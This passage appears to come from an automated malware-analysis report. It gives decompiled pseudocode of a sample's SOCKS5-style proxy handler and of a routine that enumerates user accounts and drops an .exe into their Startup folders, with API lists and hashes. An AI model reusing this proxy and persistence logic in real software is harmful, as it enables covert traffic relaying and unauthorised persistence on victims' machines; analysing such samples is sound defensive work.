    				void* __edi;
    				void* __esi;
    				signed int* _t250;
    				signed int _t259;
    				signed int _t260;
    				signed int* _t264;
    				signed int _t266;
    				signed int _t268;
    				signed int _t271;
    				signed int* _t273;
    				signed int _t276;
    				intOrPtr _t279;
    				signed int _t282;
    				signed int _t286;
    				signed int _t292;
    				signed int _t308;
    				signed int _t312;
    				signed int _t315;
    				signed int _t318;
    				signed int _t319;
    				void* _t323;
    				signed int _t324;
    				signed short _t326;
    				void* _t327;
    				signed int _t330;
    				signed short _t337;
    				signed int _t338;
    				signed char _t339;
    				signed int _t340;
    				void* _t341;
    				signed int _t342;
    				signed int _t343;
    				signed char _t350;
    				signed int _t356;
    				signed int _t358;
    				signed char _t359;
    				signed int _t361;
    				signed int _t362;
    				signed int _t363;
    				signed int _t368;
    				intOrPtr _t371;
    				signed int _t377;
    				signed int _t382;
    				void* _t386;
    				char* _t402;
    				intOrPtr _t412;
    				signed char _t418;
    				intOrPtr _t423;
    				signed int _t428;
    				signed int _t440;
    				signed char _t456;
    				signed char _t463;
    				signed int _t466;
    				short* _t467;
    				void* _t468;
    				signed int _t470;
    				signed int _t480;
    				signed int _t481;
    				intOrPtr _t483;
    				intOrPtr _t486;
    				long _t487;
    				void* _t488;
    				void* _t489;
    				signed int _t491;
    				signed int _t497;
    				void* _t498;
    				intOrPtr _t500;
    				signed int _t501;
    				signed int _t502;
    				signed int _t503;
    				void* _t504;
    
    				_t371 = _a4;
    				_t250 =  &_v1248;
    				_v1248 = 0x80;
    				__imp__#6(_t371,  &_v768, _t250);
    				if(_t250 != 0) {
    					_t382 = 0;
    					__eflags = 0;
    				} else {
    					_t382 = _v780 & 0x0000ffff;
    				}
    				_v1244 = 0 | _t382 == 0x00000017;
    				if(E00414B90(1, _t371, 0,  &_v1265) == 0) {
    					L50:
    					__eflags = 0;
    					return 0;
    				}
    				_t256 = _v1265;
    				if(_v1265 == 0 || E00414B90(_t256 & 0x000000ff, _t371, 0,  &_v780) == 0) {
    					goto L50;
    				}
    				_t259 = _v1265 & 0x000000ff;
    				if(_t259 == 0) {
    					L9:
    					_t260 = 0;
    				} else {
    					while(1) {
    						_t259 = _t259 - 1;
    						if( *(_t504 + _t259 + 0x1f8) == 0) {
    							_t260 = _t504 + _t259 + 0x1f8;
    							goto L10;
    						}
    						if(_t259 != 0) {
    							continue;
    						} else {
    							goto L9;
    						}
    						goto L10;
    					}
    				}
    				L10:
    				asm("sbb eax, eax");
    				_t264 =  &_v1260;
    				_v1260 = ( ~_t260 & 0xffff0100) + 0x0000ff05 & 0x0000ffff;
    				__imp__#19(_t371, _t264, 2, 0);
    				if(_t264 != 2) {
    					goto L50;
    				}
    				if(_v1276 != 0xff05) {
    					_v1280 = 0;
    					_t266 = E00414B90(4, _t371, 0,  &_v1232);
    					__eflags = _t266;
    					if(_t266 == 0) {
    						goto L50;
    					}
    					__eflags = _v1232 - 5;
    					if(_v1232 != 5) {
    						goto L50;
    					} else {
    						__eflags = _v1260 & 0x00000001;
    						if((_v1260 & 0x00000001) == 0) {
    							_v1228 = 2;
    							_v1224 = 0x17;
    						} else {
    							_v1228 = 0x17;
    							_v1224 = 2;
    						}
    					}
    					_t466 = 0;
    					_t268 = (_v1229 & 0x000000ff) - 1;
    					__eflags = _t268;
    					_v1252 = 0;
    					if(_t268 == 0) {
    						_t271 = E00414B90(4, _v24, 0,  &_v1208);
    						__eflags = _t271;
    						if(_t271 == 0) {
    							goto L50;
    						}
    						_t466 = HeapAlloc( *0x42e6d4, 8, 0x14);
    						_v1252 = _t466;
    						__eflags = _t466;
    						if(_t466 != 0) {
    							_t428 = 2;
    							_push(4);
    							_t273 =  &_v1208;
    							_t74 = _t466 + 4; // 0x4
    							_t386 = _t74;
    							goto L47;
    						} else {
    							_v1280 = 1;
    						}
    					} else {
    						_t356 = _t268 - 2;
    						__eflags = _t356;
    						if(_t356 == 0) {
    							_t378 = _v24;
    							_t358 = E00414B90(1, _v24, 0,  &_v1269);
    							__eflags = _t358;
    							if(_t358 == 0) {
    								goto L50;
    							}
    							_t359 = _v1269;
    							__eflags = _t359;
    							if(_t359 == 0) {
    								goto L50;
    							}
    							_t361 = E00414B90(_t359 & 0x000000ff, _t378, 0,  &_v284);
    							__eflags = _t361;
    							if(_t361 == 0) {
    								goto L50;
    							}
    							_t362 =  &_v1244;
    							 *((char*)(_t504 + (_v1269 & 0x000000ff) + 0x408)) = 0;
    							_v1244 = 0;
    							__imp__getaddrinfo( &_v284, 0, 0, _t362);
    							__eflags = _t362;
    							if(_t362 == 0) {
    								_t491 = _v1260;
    								_t463 = 0;
    								__eflags = 0;
    								do {
    									_t363 = _t491;
    									__eflags = _t491;
    									if(_t491 == 0) {
    										goto L36;
    									} else {
    										_t423 =  *((intOrPtr*)(_t504 + 0x48 + (_t463 & 0x000000ff) * 4));
    										while(1) {
    											__eflags =  *((intOrPtr*)(_t363 + 4)) - _t423;
    											if( *((intOrPtr*)(_t363 + 4)) == _t423) {
    												break;
    											}
    											_t363 =  *(_t363 + 0x1c);
    											__eflags = _t363;
    											if(_t363 != 0) {
    												continue;
    											} else {
    												goto L36;
    											}
    											goto L48;
    										}
    										_t466 = E00410840( *((intOrPtr*)(_t363 + 0x10)),  *((intOrPtr*)(_t363 + 0x18)));
    										_v1272 = _t466;
    										__eflags = _t466;
    										if(_t466 != 0) {
    											__eflags =  *_t466 - 0x17;
    											if( *_t466 != 0x17) {
    												goto L40;
    											} else {
    												 *((intOrPtr*)(_t466 + 0x18)) = 0;
    												 *((intOrPtr*)(_t466 + 4)) = 0;
    												__imp__freeaddrinfo(_v1260);
    											}
    										} else {
    											_v1296 = 1;
    											L40:
    											__imp__freeaddrinfo(_v1260);
    										}
    									}
    									goto L48;
    									L36:
    									_t463 = _t463 + 1;
    									__eflags = _t463 - 2;
    								} while (_t463 < 2);
    								_v1296 = 4;
    								__imp__freeaddrinfo(_t491);
    							} else {
    								_v1296 = 4;
    							}
    						} else {
    							__eflags = _t356 != 1;
    							if(_t356 != 1) {
    								goto L50;
    							}
    							_t36 = _t466 + 0x10; // 0x10
    							_t368 = E00414B90(_t36, _v24, 0,  &_v1076);
    							__eflags = _t368;
    							if(_t368 == 0) {
    								goto L50;
    							}
    							_t466 = HeapAlloc( *0x42e6d4, 8, 0x20);
    							_v1252 = _t466;
    							__eflags = _t466;
    							if(_t466 != 0) {
    								_t428 = 0x17;
    								_push(0x10);
    								_t273 =  &_v1076;
    								_t40 = _t466 + 8; // 0x8
    								_t386 = _t40;
    								L47:
    								_push(_t273);
    								_push(_t386);
    								 *_t466 = _t428;
    								E00410820();
    							} else {
    								_v1280 = 1;
    							}
    						}
    					}
    					L48:
    					_t276 = E00414B90(2, _v24, 0,  &_v1236);
    					__eflags = _t276;
    					if(_t276 == 0) {
    						E004107C0(_t466);
    						goto L50;
    					}
    					__eflags = _v1280;
    					_v1281 = 1;
    					if(_v1280 == 0) {
    						_t467 = _v1252;
    						 *((short*)(_t467 + 2)) = _v1236;
    						_t286 = (_v1231 & 0x000000ff) - 1;
    						__eflags = _t286;
    						if(_t286 == 0) {
    							_t480 = E00414D20(_t467);
    							__eflags = _t480 - 0xffffffff;
    							if(_t480 != 0xffffffff) {
    								E004152F0();
    								_t374 = _v24;
    								_push(_v1260);
    								_t290 = E00408CE0(_t480, _v24, 0);
    								__eflags = _t290 - 1;
    								if(_t290 != 1) {
    									__eflags = _t290 - 0xffffffff;
    									if(_t290 != 0xffffffff) {
    										_v1285 = 0;
    									} else {
    										_v1284 = 1;
    									}
    								} else {
    									_push(_t480);
    									_t290 = E004150D0(_t374);
    								}
    								goto L152;
    							} else {
    								_v1280 = 5;
    							}
    						} else {
    							_t292 = _t286 - 1;
    							__eflags = _t292;
    							if(_t292 == 0) {
    								__eflags =  *_t467 - 0x17;
    								 *((short*)(_t467 + 2)) = 0;
    								if( *_t467 != 0x17) {
    									 *((intOrPtr*)(_t467 + 4)) = 0;
    								} else {
    									E00410870(_t467 + 8, _t467 + 8, 0, 0x10);
    								}
    								_t481 = E00414EE0(_t467, 1);
    								_v1280 = _t481;
    								__eflags = _t481 - 0xffffffff;
    								if(_t481 != 0xffffffff) {
    									_push(_v1260);
    									_t468 = E00408CE0(_t481, _v24, 0);
    									__eflags = _t468 - 1;
    									if(_t468 != 1) {
    										L141:
    										E004152D0(_t295, _t481);
    										__eflags = _t468 - 0xffffffff;
    										if(_t468 != 0xffffffff) {
    											__eflags = _t468 - 1;
    											if(_t468 != 1) {
    												_v1285 = 0;
    											}
    										} else {
    											_v1284 = 1;
    										}
    									} else {
    										_t497 = E004152A0( &_v28);
    										E004152D0(_t298, _v1280);
    										__eflags = _t497 - 0xffffffff;
    										if(_t497 != 0xffffffff) {
    											E004152F0();
    											_t376 = _v28;
    											_push(_v1264 | 0x00000002);
    											_t468 = E00408CE0(_t497, _v28, 0);
    											__eflags = _t468 - 1;
    											if(_t468 == 1) {
    												_push(_t497);
    												_t295 = E004150D0(_t376);
    											}
    											_t481 = _t497;
    											goto L141;
    										} else {
    											_v1284 = 1;
    										}
    									}
    								} else {
    									_v1280 = 5;
    								}
    							} else {
    								__eflags = _t292 == 1;
    								if(_t292 == 1) {
    									_t483 = _v24;
    									_v1212 = 0x80;
    									_v1220 = 0x80;
    									__imp__#6(_t483,  &_v1204,  &_v1212);
    									__eflags = 0x80;
    									if(0x80 != 0) {
    										L62:
    										_v1292 = 1;
    									} else {
    										_t308 =  &_v1232;
    										__imp__#5(_t483,  &_v424, _t308);
    										__eflags = _t308;
    										if(_t308 != 0) {
    											goto L62;
    										} else {
    											__eflags = _v1228 - 0x17;
    											_v1226 = 0;
    											if(_v1228 == 0x17) {
    												_v1204 = _t308;
    												_v1224 = _t308;
    											}
    											_t498 = E00415320( &_v1228);
    											_v1280 = _t498;
    											__eflags = _t498 - 0xffffffff;
    											if(_t498 != 0xffffffff) {
    												_t377 = HeapAlloc( *0x42e6d4, 8, 0x10003);
    												__eflags = _t377;
    												if(_t377 != 0) {
    													_push(_v1284);
    													_t312 = E00408CE0(_t498, _t483, 0);
    													__eflags = _t312 - 1;
    													if(_t312 != 1) {
    														__eflags = _t312 - 0xffffffff;
    														if(_t312 != 0xffffffff) {
    															_v1309 = 0;
    															_t290 = E004107C0(_t377);
    															_t480 = _t498;
    														} else {
    															_v1308 = 1;
    															_t290 = E004107C0(_t377);
    															_t480 = _t498;
    														}
    													} else {
    														_t470 = 0;
    														_t315 = _t312 | 0xffffffff;
    														_v1292 = _t315;
    														_v1276 = 0;
    														_v1304 = 0;
    														_v1088 = 2;
    														_v1084 = _t483;
    														_v1080 = _t498;
    														_v1076 = _t315;
    														__imp__#18(0,  &_v1088, 0, 0, 0);
    														__eflags = _t315;
    														if(_t315 > 0) {
    															while(1) {
    																_t315 = E00414B60( &_v1108, _t483);
    																__eflags = _t315;
    																if(_t315 == 0) {
    																	goto L71;
    																}
    																__imp__#16(_t483, _t377, 0xffff, 0);
    																__eflags = _t315;
    																if(_t315 > 0) {
    																	goto L71;
    																}
    																goto L126;
    																L71:
    																_v1316 = 0x80;
    																_t318 = E00414B60( &_v1108, _t498);
    																__eflags = _t318;
    																if(_t318 == 0) {
    																	L116:
    																	_t486 = _v1312;
    																	__eflags = _t486 - 0xffffffff;
    																	if(_t486 != 0xffffffff) {
    																		_t319 = E00414B60( &_v1108, _t486);
    																		__eflags = _t319;
    																		if(_t319 != 0) {
    																			_t440 =  &_v1252;
    																			__imp__#17(_t486, _t377 + _t470, 0xffff, 0, _t440,  &_v1316);
    																			_t500 = _v1320;
    																			__eflags = 0xffff - _t470;
    																			if(0xffff - _t470 > 0) {
    																				L120:
    																				 *_t377 = 0;
    																				 *((char*)(_t377 + 2)) = 0;
    																				__eflags = _v1276 - 0x17;
    																				 *(_t377 + 3) = ((_t440 & 0xffffff00 | _v1276 != 0x00000017) - 0x00000001 & 0x00000003) + 1;
    																				__eflags = _t500 - 0x17;
    																				if(_t500 != 0x17) {
    																					__eflags = _t500 - 2;
    																					if(_t500 == 2) {
    																						_push(4);
    																						_t402 =  &_v1272;
    																						goto L124;
    																					}
    																				} else {
    																					_push(0x10);
    																					_t402 =  &_v1268;
    																					L124:
    																					_t202 = _t377 + 4; // 0x4
    																					E00410820();
    																					_t205 = _t470 - 2; // -2
    																					_t323 = E00410820(_t377 + _t205,  &_v1286, 2);
    																					_t324 = _t323 + _t470;
    																					__eflags = _t324;
    																					__imp__#20(_v1352, _t377, _t324, 0,  &_v636, _v1372, _t202, _t402);
    																				}
    																			} else {
    																				_t440 = _v1276 & 0x0000ffff;
    																				__eflags = _t500 - _t440;
    																				if(_t500 == _t440) {
    																					goto L120;
    																				}
    																			}
    																		}
    																	}
    																	_t315 = _v1304;
    																	__eflags = _t486 - 0xffffffff;
    																	_v1104 = _v72;
    																	_v1100 = _t315;
    																	_v1096 = _t486;
    																	_v1108 = (0 | _t486 != 0xffffffff) + 2;
    																	__imp__#18(0,  &_v1108, 0, 0, 0);
    																	__eflags = _t315;
    																	if(_t315 > 0) {
    																		_t498 = _v1324;
    																		_t483 = _v92;
    																		continue;
    																	}
    																} else {
    																	_t315 =  &_v1316;
    																	__imp__#17(_v1304, _t377, 0xffff, 0,  &_v1252, _t315);
    																	_t501 = _t315;
    																	_v1288 = _t501;
    																	__eflags = _t501;
    																	if(_t501 > 0) {
    																		__eflags = _t501 - 6;
    																		if(_t501 < 6) {
    																			goto L116;
    																		} else {
    																			_t326 = _v1276;
    																			__eflags = _v484 - _t326;
    																			if(_v484 != _t326) {
    																				goto L116;
    																			} else {
    																				__eflags = _t326 - 2;
    																				if(_t326 != 2) {
    																					__eflags = _t326 - 0x17;
    																					if(_t326 != 0x17) {
    																						goto L84;
    																					} else {
    																						_t489 = 0;
    																						while(1) {
    																							_t350 =  *((intOrPtr*)(_t504 + _t489 + 0x380));
    																							_t418 =  *((intOrPtr*)(_t504 + _t489 + 0x68));
    																							__eflags = _t350 - _t418;
    																							if(_t350 != _t418) {
    																								break;
    																							}
    																							_t489 = _t489 + 1;
    																							__eflags = _t489 - 0x10;
    																							if(_t489 < 0x10) {
    																								continue;
    																							} else {
    																								goto L84;
    																							}
    																							goto L126;
    																						}
    																						__eflags = (_t350 & 0x000000ff) - (_t418 & 0x000000ff);
    																						goto L83;
    																					}
    																				} else {
    																					__eflags = _v480 - _v1272;
    																					L83:
    																					if(__eflags != 0) {
    																						goto L116;
    																					} else {
    																						L84:
    																						__eflags =  *((char*)(_t377 + 2));
    																						if( *((char*)(_t377 + 2)) != 0) {
    																							goto L116;
    																						} else {
    																							_t327 = 0;
    																							__eflags =  *_t377;
    																							if( *_t377 != 0) {
    																								goto L116;
    																							} else {
    																								__eflags = _v1348;
    																								if(_v1348 == 0) {
    																									_t327 = E00410820( &_v612,  &_v1276, _v1340);
    																									__eflags = _v624 - 0x17;
    																									if(_v624 == 0x17) {
    																										_v588 = 0;
    																										_v608 = 0;
    																									}
    																									_v1348 = _v1340;
    																								}
    																								E00410870(_t327,  &_v1276, _t327, 0x80);
    																								_t330 = ( *(_t377 + 3) & 0x000000ff) - 1;
    																								__eflags = _t330;
    																								if(_t330 == 0) {
    																									__eflags = _t501 - 0xa;
    																									if(_t501 <= 0xa) {
    																										goto L116;
    																									} else {
    																										_t168 = _t377 + 4; // 0x4
    																										_v1340 = 0x10;
    																										_v1276 = 2;
    																										E00410820( &_v1272, _t168, 4);
    																										_t487 = 8;
    																										goto L110;
    																									}
    																								} else {
    																									_t338 = _t330 - 2;
    																									__eflags = _t338;
    																									if(_t338 == 0) {
    																										_t339 =  *((intOrPtr*)(_t377 + 4));
    																										__eflags = _t339;
    																										if(_t339 != 0) {
    																											_t340 = _t339 & 0x000000ff;
    																											__eflags = _t501 - _t340 + 7;
    																											if(_t501 > _t340 + 7) {
    																												_t145 = _t377 + 5; // 0x5
    																												_t341 = E00410820( &_v868, _t145, _t340);
    																												 *((char*)(_t504 + _t341 + 0x200)) = 0;
    																												_t150 = _t341 + 5; // 0x5
    																												_t487 = _t150;
    																												_t342 =  &_v880;
    																												_v1324 = 0;
    																												__imp__getaddrinfo(_t342, 0, 0,  &_v1324);
    																												__eflags = _t342;
    																												if(_t342 == 0) {
    																													_t503 = _v1328;
    																													_t456 = 0;
    																													__eflags = 0;
    																													do {
    																														_t343 = _t503;
    																														__eflags = _t503;
    																														if(_t503 == 0) {
    																															goto L103;
    																														} else {
    																															_t412 =  *((intOrPtr*)(_t504 + 0x48 + (_t456 & 0x000000ff) * 4));
    																															while(1) {
    																																__eflags =  *((intOrPtr*)(_t343 + 4)) - _t412;
    																																if( *((intOrPtr*)(_t343 + 4)) == _t412) {
    																																	break;
    																																}
    																																_t343 =  *(_t343 + 0x1c);
    																																__eflags = _t343;
    																																if(_t343 != 0) {
    																																	continue;
    																																} else {
    																																	goto L103;
    																																}
    																																goto L126;
    																															}
    																															_v1356 =  *((intOrPtr*)(_t343 + 0x10));
    																															E00410820( &_v1292,  *((intOrPtr*)(_t343 + 0x18)),  *((intOrPtr*)(_t343 + 0x10)));
    																															__eflags = _v1304 - 0x17;
    																															if(_v1304 == 0x17) {
    																																__eflags = 0;
    																																_v1268 = 0;
    																																_v1288 = 0;
    																															}
    																															__imp__freeaddrinfo(_v1328);
    																															_t501 = _v1308;
    																															goto L110;
    																														}
    																														goto L126;
    																														L103:
    																														_t456 = _t456 + 1;
    																														__eflags = _t456 - 2;
    																													} while (_t456 < 2);
    																												}
    																											}
    																										}
    																										goto L116;
    																									} else {
    																										__eflags = _t338 != 1;
    																										if(_t338 != 1) {
    																											goto L116;
    																										} else {
    																											__eflags = _t501 - 0x16;
    																											if(_t501 <= 0x16) {
    																												goto L116;
    																											} else {
    																												_t138 = _t377 + 4; // 0x4
    																												_v1340 = 0x1c;
    																												_v1276 = 0x17;
    																												_t142 = E00410820( &_v1268, _t138, 0x10) - 3; // -3
    																												_t487 = _t142;
    																												L110:
    																												_t488 = _t487 + 2;
    																												__eflags = _v1336 - 0xffffffff;
    																												_v1274 =  *((intOrPtr*)(_t377 + _t487));
    																												if(_v1336 != 0xffffffff) {
    																													L113:
    																													__eflags = _t501 - _t488;
    																													if(_t501 > _t488) {
    																														__eflags = _v1320 - (_v1276 & 0x0000ffff);
    																														if(_v1320 == (_v1276 & 0x0000ffff)) {
    																															_t502 = _t501 - _t488;
    																															__eflags = _t502;
    																															__imp__#20(_v1336, _t377 + _t488, _t502, 0,  &_v1276, _v1340);
    																														}
    																													}
    																													goto L116;
    																												} else {
    																													E00410870( &_v868,  &_v868, 0, 0x80);
    																													_t337 = _v1288;
    																													_v880 = _t337;
    																													_v1332 = _t337 & 0x0000ffff;
    																													_t315 = E00415320( &_v880);
    																													_v1348 = _t315;
    																													__eflags = _t315 - 0xffffffff;
    																													if(_t315 != 0xffffffff) {
    																														asm("sbb edi, edi");
    																														_t470 = ( ~(_v1320 - 0x17) & 0xfffffff4) + 0x16;
    																														__eflags = _t470;
    																														goto L113;
    																													}
    																												}
    																											}
    																										}
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    																goto L126;
    															}
    														}
    														L126:
    														E004152D0(_t315, _v1312);
    														_t290 = E004107C0(_t377);
    														_t480 = _v1304;
    													}
    												} else {
    													_v1304 = 1;
    													_t480 = _t498;
    												}
    												L152:
    												E004152D0(_t290, _t480);
    											} else {
    												goto L62;
    											}
    										}
    									}
    								} else {
    									_v1280 = 7;
    								}
    							}
    						}
    					}
    					E004107C0(_v1252);
    					_t279 = _v1281;
    					__eflags = _t279 - 1;
    					if(_t279 != 1) {
    						L51:
    						return _t279;
    					} else {
    						__eflags = _v1280;
    						if(_v1280 == 0) {
    							goto L51;
    						} else {
    							_push(_v1260);
    							_t282 = E00408CE0(_v1280 | 0xffffffff, _v24, _v1280);
    							__eflags = _t282;
    							_t249 = _t282 != 0;
    							__eflags = _t249;
    							return _t282 & 0xffffff00 | _t249;
    						}
    					}
    				} else {
    					return 1;
    				}
    			}

    APIs
    • getsockname.WS2_32 ref: 00408E57
    • send.WS2_32(?,?,00000002,00000000), ref: 00408EF2
      • Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
      • Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01
    • HeapAlloc.KERNEL32(?,00000008,00000020,?,?,?,?,?,?,?,?,?), ref: 00408FBD
    • getsockname.WS2_32(?,?,?), ref: 004091B4
    • getpeername.WS2_32(?,?,?), ref: 004091CC
    • HeapAlloc.KERNEL32(?,00000008,00010003), ref: 00409218
    • select.WS2_32 ref: 00409285
    • recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 004092B9
    • recvfrom.WS2_32(?,00000000,0000FFFF,00000000,?,00000080), ref: 004092FC
      • Part of subcall function 004152D0: shutdown.WS2_32(00000000,00000002), ref: 004152D8
      • Part of subcall function 004152D0: closesocket.WS2_32(00000000), ref: 004152DF
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocHeapgetsocknamerecvselect$closesocketgetpeernamerecvfromsendshutdown
    • String ID:
    • API String ID: 1523422563-0
    • Opcode ID: 705aebef64035694f3be4cd527b2f20f0892be9155331a43747557b0353bfd50
    • Instruction ID: b8c940c71f80db384a4505ddf1698f160a7933dfec3a6e730242661171ae3604
    • Opcode Fuzzy Hash: 705aebef64035694f3be4cd527b2f20f0892be9155331a43747557b0353bfd50
    • Instruction Fuzzy Hash: 2552E3715083429AD720DF25C984BABB7E4AFC4304F04493EF595AB2C2E778DD45CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0040FEA0(void* __eflags) {
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t74;
    				void* _t78;
    				void* _t80;
    				void* _t82;
    				void* _t84;
    				void* _t89;
    				void* _t90;
    				void* _t91;
    				signed int _t93;
    				void* _t95;
    				void* _t96;
    				void* _t97;
    				void* _t99;
    				void* _t102;
    				int _t107;
    				signed int _t109;
    				char _t112;
    				void* _t113;
    				void* _t114;
    				WCHAR* _t123;
    				intOrPtr* _t129;
    				CHAR* _t144;
    				WCHAR* _t147;
    				struct HINSTANCE__* _t148;
    				void* _t149;
    				void* _t152;
    				void* _t155;
    				signed int _t156;
    				void* _t157;
    
    				_t147 = _t157 + 0x2c;
    				_t112 = 0;
    				E00424100(0xe1, _t147);
    				_t148 = LoadLibraryW(_t147);
    				if(_t148 == 0) {
    					L14:
    					return 0;
    				} else {
    					_t144 = _t157 + 0x48;
    					E004240C0(0xe2, _t144);
    					_t74 = GetProcAddress(_t148, _t144);
    					if(_t74 != 0) {
    						 *((intOrPtr*)(_t157 + 0x20)) = 0x104;
    						_t107 =  *_t74(_t157 + 0x6c, _t157 + 0x18);
    						if(_t107 == 1) {
    							__imp__SHGetFolderPathW(0, 7, 0xffffffff, _t107, _t157 + 0x270);
    							if(_t107 == 0) {
    								if( *((intOrPtr*)(_t157 + 0x68)) != _t107) {
    									do {
    										_t107 = _t107 + 1;
    									} while ( *((short*)(_t157 + 0x68 + _t107 * 2)) != 0);
    								}
    								 *(_t157 + 0x1c) = _t107;
    								_t109 = StrCmpNIW(_t157 + 0x70, _t157 + 0x274, _t107);
    								if(_t109 == 0) {
    									_t129 = _t157 + 0x270 +  *(_t157 + 0x18) * 2;
    									if(_t129 != 0 &&  *_t129 != _t109) {
    										do {
    											_t109 = _t109 + 1;
    										} while ( *((short*)(_t129 + _t109 * 2)) != 0);
    									}
    									 *((short*)(_t157 + E00410820(_t157 + 0x278, _t129, _t109 + _t109) + 0x270)) = 0;
    									_t112 = 1;
    								}
    							}
    						}
    					}
    					FreeLibrary(_t148);
    					if(_t112 != 0) {
    						 *((char*)(_t157 + 0x17)) = 0;
    						 *(_t157 + 0x28) = 0;
    						do {
    							_t156 = 0;
    							 *((intOrPtr*)(_t157 + 0x38)) = 0;
    							_t149 = NetUserEnum(0, 0, 2, _t157 + 0x28, 0xffffffff, _t157 + 0x28, _t157 + 0x48, _t157 + 0x28);
    							 *(_t157 + 0x24) = _t149;
    							__eflags = _t149;
    							if(_t149 == 0) {
    								L18:
    								__eflags =  *(_t157 + 0x18) - _t156;
    								if( *(_t157 + 0x18) != _t156) {
    									__eflags =  *((intOrPtr*)(_t157 + 0x20)) - _t156;
    									if( *((intOrPtr*)(_t157 + 0x20)) > _t156) {
    										do {
    											_t89 = NetUserGetInfo(0,  *( *(_t157 + 0x18) + _t156 * 4), 0x17, _t157 + 0x1c);
    											__eflags = _t89;
    											if(_t89 == 0) {
    												_t90 =  *(_t157 + 0x1c);
    												__eflags = _t90;
    												if(_t90 != 0) {
    													_t91 = E00410670( *((intOrPtr*)(_t90 + 0x10)), _t157 + 0x68);
    													__eflags = _t91;
    													if(_t91 != 0) {
    														_t123 = _t157 + 0x270;
    														while(1) {
    															_t93 =  *_t123 & 0x0000ffff;
    															__eflags = _t93 - 0x5c;
    															if(_t93 == 0x5c) {
    																goto L26;
    															}
    															L25:
    															__eflags = _t93 - 0x2f;
    															if(_t93 == 0x2f) {
    																goto L26;
    															}
    															_t95 = PathCombineW(_t157 + 0x6c, _t157 + 0x6c, _t123);
    															__eflags = _t95;
    															if(_t95 != 0) {
    																_t96 = E00418550(_t157 + 0x68);
    																__eflags = _t96;
    																if(_t96 != 0) {
    																	_push(6);
    																	_t97 = E00416A10(_t157 + 0x488, 0, _t157 + 0x70, L".exe");
    																	__eflags = _t97;
    																	if(_t97 != 0) {
    																		_t99 = E00418040(0,  *0x42e954, _t157 + 0x2c);
    																		__eflags = _t99;
    																		if(_t99 != 0) {
    																			_t155 =  *(_t157 + 0x2c);
    																			_t114 = E0040EE70(_t157 + 0x484, _t155,  *((intOrPtr*)(_t157 + 0x30)), 0);
    																			__eflags = _t155;
    																			if(_t155 != 0) {
    																				VirtualFree(_t155, 0, 0x8000);
    																			}
    																			_t102 =  *(_t157 + 0x34);
    																			__eflags = _t102;
    																			if(_t102 != 0) {
    																				CloseHandle(_t102);
    																			}
    																			__eflags = _t114;
    																			if(__eflags != 0) {
    																				 *((char*)(_t157 + 0x1f)) = 1;
    																				E0040F100(__eflags,  *((intOrPtr*)( *(_t157 + 0x1c) + 0x10)), _t157 + 0x478);
    																			}
    																		}
    																	}
    																}
    															}
    															goto L37;
    															L26:
    															_t123 =  &(_t123[1]);
    															_t93 =  *_t123 & 0x0000ffff;
    															__eflags = _t93 - 0x5c;
    															if(_t93 == 0x5c) {
    																goto L26;
    															}
    															goto L25;
    														}
    													}
    													L37:
    													NetApiBufferFree( *(_t157 + 0x1c));
    													_t149 =  *(_t157 + 0x24);
    												}
    											}
    											_t156 = _t156 + 1;
    											__eflags = _t156 -  *((intOrPtr*)(_t157 + 0x20));
    										} while (_t156 <  *((intOrPtr*)(_t157 + 0x20)));
    									}
    									NetApiBufferFree( *(_t157 + 0x18));
    								}
    								goto L40;
    							} else {
    								__eflags = _t149 - 0xea;
    								if(_t149 == 0xea) {
    									goto L18;
    								}
    							}
    							break;
    							L40:
    							__eflags = _t149 - 0xea;
    						} while (_t149 == 0xea);
    						_t78 = _t157 + 0x270;
    						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t78);
    						__eflags = _t78;
    						if(_t78 == 0) {
    							_push(6);
    							_t80 = E00416A10(_t157 + 0x488, _t78, _t157 + 0x278, L".exe");
    							__eflags = _t80;
    							if(_t80 != 0) {
    								_t82 = E00418040(0,  *0x42e954, _t157 + 0x2c);
    								__eflags = _t82;
    								if(_t82 != 0) {
    									_t152 =  *(_t157 + 0x2c);
    									_t113 = E0040EE70(_t157 + 0x484, _t152,  *((intOrPtr*)(_t157 + 0x30)), 0);
    									__eflags = _t152;
    									if(_t152 != 0) {
    										VirtualFree(_t152, 0, 0x8000);
    									}
    									_t84 =  *(_t157 + 0x34);
    									__eflags = _t84;
    									if(_t84 != 0) {
    										CloseHandle(_t84);
    									}
    									__eflags = _t113;
    									if(_t113 != 0) {
    										 *((char*)(_t157 + 0x17)) = 1;
    									}
    								}
    							}
    						}
    						return  *((intOrPtr*)(_t157 + 0x17));
    					} else {
    						goto L14;
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,?,00000000), ref: 0040FEBD
    • GetProcAddress.KERNEL32(00000000,?), ref: 0040FEDF
    • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000000,?), ref: 0040FF19
    • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040FF4B
    • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040FF96
    • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,00000000), ref: 0040FFDA
    • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041001B
    • PathCombineW.SHLWAPI(?,?,?,?,?,00000017,?), ref: 0041006C
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,.exe,00000006,?,?,00000017,?), ref: 004100E5
    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,?,.exe,00000006,?,?,00000017,?), ref: 004100F4
    • NetApiBufferFree.NETAPI32(?,?,?,00000017,?), ref: 0041011D
    • NetApiBufferFree.NETAPI32(?), ref: 00410137
    • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041015C
